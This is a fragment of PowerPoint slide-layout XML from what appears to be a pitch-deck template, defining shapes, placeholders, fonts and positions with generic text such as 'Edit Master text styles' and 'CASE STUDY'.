              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA0EB90-BA97-4A18-AD3D-1E839B636DEB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567432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ED057A87-963C-4F8A-BD4C-959BF8AF699B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6714774" y="3930376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B6BAFE05-9EC0-4C3C-AB0F-89A83361452F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8350818" y="4992196"/>
            <a:ext cx="1625324" cy="328343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600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI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Customer Title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290BF8E2-78CA-4427-9231-3C5EDC272DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8350818" y="4187128"/>
            <a:ext cx="1625324" cy="720726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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA8732F-AB9E-4253-BB5A-5ADD5BA9B153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="56"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9976142" y="4430694"/>
            <a:ext cx="1106424" cy="1106423"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr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BB9A566A-8C97-4AE6-B9EF-701587499889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10529354" y="3980054"/>
            <a:ext cx="0" cy="442551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 Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B69021-5E85-4B37-B529-366AC57512FD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8331612" y="1769589"/>
            <a:ext cx="3044973" cy="2212848"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3044952"/>
              <a:gd name="connsiteY0" fmla="*/ 368815 h 2212848"/>
              <a:gd name="connsiteX1" fmla="*/ 3688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676137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0 w 3044952"/>
              <a:gd name="connsiteY0" fmla="*/ 368815 h 2212848"/>
              <a:gd name="connsiteX1" fmla="*/ 254515 w 3044952"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2212848"/>
              <a:gd name="connsiteX2" fmla="*/ 2842392 w 3044952"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2212848"/>
              <a:gd name="connsiteX3" fmla="*/ 3044952 w 3044952"/>
              <a:gd name="connsiteY3" fmla="*/ 368815 h 2212848"/>
              <a:gd name="connsiteX4" fmla="*/ 3044952 w 3044952"/>
              <a:gd name="connsiteY4" fmla="*/ 1844033 h 2212848"/>
              <a:gd name="connsiteX5" fmla="*/ 2676137 w 3044952"/>
              <a:gd name="connsiteY5" fmla="*/ 2212848 h 2212848"/>
              <a:gd name="connsiteX6" fmla="*/ 368815 w 3044952"/>
              <a:gd name="connsiteY6" fmla="*/ 2212848 h 2212848"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3044952"/>
              <a:gd name="connsiteY7" fmla="*/ 1844033 h 2212848"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3044952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368836 w 3044973"/>
              <a:gd name="connsiteY6" fmla="*/ 2212848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676158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  <a:gd name="connsiteX0" fmla="*/ 21 w 3044973"/>
              <a:gd name="connsiteY0" fmla="*/ 368815 h 2212848"/>
              <a:gd name="connsiteX1" fmla="*/ 197386 w 3044973"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2212848"/>
              <a:gd name="connsiteX2" fmla="*/ 2842413 w 3044973"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2212848"/>
              <a:gd name="connsiteX3" fmla="*/ 3044973 w 3044973"/>
              <a:gd name="connsiteY3" fmla="*/ 368815 h 2212848"/>
              <a:gd name="connsiteX4" fmla="*/ 3044973 w 3044973"/>
              <a:gd name="connsiteY4" fmla="*/ 1844033 h 2212848"/>
              <a:gd name="connsiteX5" fmla="*/ 2842413 w 3044973"/>
              <a:gd name="connsiteY5" fmla="*/ 2212848 h 2212848"/>
              <a:gd name="connsiteX6" fmla="*/ 233754 w 3044973"/>
              <a:gd name="connsiteY6" fmla="*/ 2207652 h 2212848"/>
              <a:gd name="connsiteX7" fmla="*/ 21 w 3044973"/>
              <a:gd name="connsiteY7" fmla="*/ 1844033 h 2212848"/>
              <a:gd name="connsiteX8" fmla="*/ 21 w 3044973"/>
              <a:gd name="connsiteY8" fmla="*/ 368815 h 22128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044973" h="2212848">
                <a:moveTo>
                  <a:pt x="21" y="368815"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="165124"/>
                  <a:pt x="-6305" y="0"/>
                  <a:pt x="197386" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2842413" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3046104" y="0"/>
                  <a:pt x="3044973" y="165124"/>
                  <a:pt x="3044973" y="368815"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3044973" y="1844033"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3044973" y="2047724"/>
                  <a:pt x="3046104" y="2212848"/>
                  <a:pt x="2842413" y="2212848"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="233754" y="2207652"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30063" y="2207652"/>
                  <a:pt x="21" y="2047724"/>
                  <a:pt x="21" y="1844033"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21" y="368815"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="216000" tIns="180000" rIns="216000" bIns="180000">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0"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E407CD49-808A-445A-96C0-E3083C9FB390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10478954" y="3925610"/>
            <a:ext cx="100800" cy="100800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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41312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1980591"/>
            <a:ext cx="4187903" cy="1177174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CASE STUDY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610893"/>
            <a:ext cx="4168311" cy="189753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319328"/>
            <a:ext cx="3866400" cy="100800"/>
            <a:chOff x="-1228304" y="3240138"/>
            <a:chExt cx="3866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1228304" y="3290538"/>
              <a:ext cx="3816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2537296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82DA762C-1D45-43AA-9DB3-3D8DBE3EACFE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5267325" y="1126345"/>
            <a:ext cx="6086475" cy="2662466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4C3C1BF4-C955-4D71-87E4-BE0F7B619575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5269967" y="3909256"/>
            <a:ext cx="6086475" cy="1822399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59565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bile Phon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294387"/>
            <a:ext cx="5314072" cy="569086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600"/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096000" y="2212679"/>
            <a:ext cx="5292725" cy="978407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096000" y="1970230"/>
            <a:ext cx="6096000" cy="100800"/>
            <a:chOff x="646015" y="3248308"/>
            <a:chExt cx="3107749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46015" y="3290538"/>
              <a:ext cx="3107749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702376" y="3248308"/>
              <a:ext cx="51388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BD2EF23-562D-4049-92E3-48371C9E83A4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6098826" y="3335524"/>
            <a:ext cx="5311245" cy="2248846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6B07E0-C579-4C5F-9AD4-6AF791562924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963549" y="1819285"/>
            <a:ext cx="4306824" cy="3648456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-195" b="-195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D5639F99-011E-49CF-8ABD-A4DB4439FB4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315505" y="1976894"/>
            <a:ext cx="1819656" cy="3108960"/>
          </a:xfrm>
          <a:ln w="254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028483B2-B562-448D-AEE1-556BC9366BBA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1102188" y="3517926"/>
            <a:ext cx="2057400" cy="1819656"/>
          </a:xfrm>
          <a:ln w="254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9576342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34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42737603-04DB-411C-B2D9-BDFF9AEE89D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605A03A4-E79C-49C5-A546-FF8E2D42E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3319" y="3054194"/>
            <a:ext cx="1645920" cy="618756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2" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA27EF7-FC6B-496C-B737-B9219950367E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1384584" y="2023761"/>
            <a:ext cx="2469965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  <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>styles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6C0E2C30-6E91-49DE-B7A1-6E32A19EC81D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="36"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596444" y="3054194"/>
            <a:ext cx="1389888" cy="618756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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70BE5E73-C067-492F-BE30-5E3DADAD40EF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875852" y="3731781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5" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36A9B448-4FDC-41F7-941E-5BF5A129057A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2499831" y="3731781"/>
            <a:ext cx="1636776" cy="1618488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6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90B3A413-8776-4B3B-931F-C132DAB3A425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="39"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4940427" y="3054194"/>
            <a:ext cx="2113508" cy="618756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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD0CCD5-B712-4DB2-BFE3-4D3461B29F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5494328" y="2023761"/>
            <a:ext cx="1943702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  <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64125935-B0D3-4ABD-9BBA-A60E46D2C55C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946407" y="3731781"/>
            <a:ext cx="2048256" cy="896112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9" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D3BA4D-FA26-44C8-B927-E42CC8E67B79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="45"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900319" y="3054194"/>
            <a:ext cx="2197045" cy="618756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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2A84D7-2523-470B-A3C0-0140355D4F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8454220" y="2023761"/>
            <a:ext cx="1943702" cy="982274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" bIns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000" b="1" kern="1200" dirty="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Master text</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>styles</a:t>
            </a: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55D1A91B-BB99-4DC7-B8F5-55514B49A9D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="49"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900319" y="4671712"/>
            <a:ext cx="2223939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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAB2C75-BBBF-4A4D-A633-7CEFFABAFE32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="51"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4940427" y="4830765"/>
            <a:ext cx="2048256" cy="519503"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns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noProof="0"/>
              <a:t>Edit Master text styles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83CD3289-0FBC-4854-8EB2-ADD41F89CA4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3358" y="2023413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7000" b="1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2F18CD59-6602-4DEC-9B12-412E6BAF928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912823" y="1999493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ru-RU" sz="7000" b="1" kern="1200" dirty="0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noProof="0"/>
              <a:t>1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88B09568-0B94-4B51-BE65-A72C65C3D7DA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73424" y="2002966"/>
            <a:ext cx="558402" cy="896112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lang="ru-RU" sz="7000" b="1" kern="1200" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:noFill/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noProof="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315834F5-9ACD-4898-B96E-8C732881FF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="50"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359124" y="5706529"/>
            <a:ext cx="8993089" cy="365122"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr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7E5CF6DE-4761-4BA5-A429-30AC8BBAD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9" y="780001"/>
            <a:ext cx="10512424" cy="606677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0"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HOW TO USE THIS TEMPLATE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A4896B5-1C5E-47F0-8F0C-4EF97E356C8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900319" y="3779907"/>
            <a:ext cx="1481328" cy="7589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87F4783-C8BA-411C-A188-4A4DAED10C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="4416000" y="1375202"/>
            <a:ext cx="7776000" cy="100800"/>
            <a:chOff x="-322289" y="3240138"/>
            <a:chExt cx="5070122" cy="100800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59A2713-966D-4694-A067-D6BE1B2986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22289" y="3290538"/>
              <a:ext cx="5070122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CA15F19-C2FE-4F13-9359-69E884CA83B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4682109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2535776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78196A9-689D-4410-BFC0-7ACB19755A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="4416552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-842" r="-84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9BFEAD-57CF-438A-8084-C5AC7F47E54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462986"/>
            <a:ext cx="9144000" cy="1786094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7A3CB-B083-4E49-9123-A5E47559D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4102C-4609-416C-A808-0FFE0051D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BCC5D-6F2C-472F-BD4C-4096793D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E854BB-FA44-4CAB-85DF-F5C412560348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4416552"/>
            <a:ext cx="12192000" cy="2441448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9BFFF1-5465-4317-B9DB-C23A5B1D76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34696"/>
            <a:ext cx="9144000" cy="459798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76B4374-8F24-43DE-860D-E5C6EA850AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3619265" y="2253996"/>
            <a:ext cx="4953471" cy="100584"/>
            <a:chOff x="3631692" y="2253996"/>
            <a:chExt cx="4953471" cy="100584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85C7755-9394-4129-AB48-1AC32DA80C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3631692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4C71ABE-575A-48CF-82B1-EDE8535F3993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3C1EA63-78B2-4715-B4DC-63D98AC7F354}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8484579" y="2253996"/>
              <a:ext cx="100584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9BB74A1-0BEA-4AD8-8138-0641A45D8B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4652581" y="5305363"/>
            <a:ext cx="2886839" cy="100584"/>
            <a:chOff x="3631690" y="2253996"/>
            <a:chExt cx="5028467" cy="100584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3D0026E-5270-4C52-A1AF-5631E8192DCD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6085D92-5F70-4097-A2FF-C15B13788D0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828032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E68EB6C-48D0-4EBF-8541-926D16790F52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8484578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13641896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5015858-8549-49EA-BB83-070E0D9D4890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083808" y="0"/>
            <a:ext cx="6108192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6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06FBAC-B8FD-4768-B682-E0B93BA3310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769768" y="2133599"/>
            <a:ext cx="4618957" cy="2492461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>PITCH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>DECK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>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2534F-03A6-408A-9BF1-303D0A440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4E181-0C50-4F43-A5A7-6FDD1500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749CC-EB55-4FEF-AA4C-9A9C6E2AA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F3E26A6-6962-4A35-AA86-805537D45296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6769768" y="1947412"/>
            <a:ext cx="2520148" cy="102440"/>
            <a:chOff x="3631690" y="2252140"/>
            <a:chExt cx="4389743" cy="102440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81504C4-12AC-4251-8E47-0089784BDB9B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92040D0-01C2-4643-8F84-3B8F334E545C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5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ED601E9-2BFC-460B-A2A8-69A787A4988E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7845854" y="2252140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B49A8A6-FEDB-4D20-B581-A84DB8EFE977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6769768" y="4654084"/>
            <a:ext cx="2520148" cy="100584"/>
            <a:chOff x="3631690" y="2253996"/>
            <a:chExt cx="4389742" cy="100584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F65998-5EC3-446A-8307-1CF81A348CE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3631690" y="2253996"/>
              <a:ext cx="175203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CC5D776-F60A-4A0C-AA7C-EFACDA2CEA88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681984" y="2307679"/>
              <a:ext cx="4201364" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700"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EAFE309-55C5-409C-92ED-748307C74318}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7845853" y="2253996"/>
              <a:ext cx="175579" cy="100584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Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B77B20B-76F5-4912-803D-5709F730D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9767" y="4889444"/>
            <a:ext cx="4618957" cy="590626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns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800" b="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B07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91958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091023"/>
            <a:ext cx="5021940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244567"/>
            <a:ext cx="4205904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3434400" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3434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333600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869349"/>
            <a:ext cx="4215201" cy="132833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DE71F7A0-F439-470D-A1B8-556C960D112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3003" y="2490534"/>
            <a:ext cx="6083300" cy="2587752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3996927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EA943F6-C418-4339-8C7E-A12127BDE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7777"/>
            <a:ext cx="10515600" cy="453429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8446813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B6FE9A2-5CE4-4652-97CE-3FF947D5485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FD6D4E1-CC57-4556-9CB7-31B3754772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159497"/>
            <a:ext cx="5181600" cy="4543719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2AE7A31C-D605-4363-B037-1938B9304C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159497"/>
            <a:ext cx="5181600" cy="4543719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8491594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B5E40D-C1A5-4C5A-BBA0-C3E41F028D0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85C650EE-495E-44EB-870B-AC85B18EB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256955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77DCC2A5-8A6A-431F-BD6C-93E32539A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203414"/>
            <a:ext cx="5157787" cy="339763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7FE620E9-8AD3-4771-8897-E65B461E28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56955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B75F265B-9F81-4A64-A8D4-7D0A31CEA4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203414"/>
            <a:ext cx="5183188" cy="3397631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  <a:lvl3pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1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4080301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A02905C-2C7D-4445-B47F-3EBBA4465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7BC8A51-D50F-4F98-9402-8FF90BD2D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AE79E65-3D1E-4444-9BD4-8578BF0C6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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
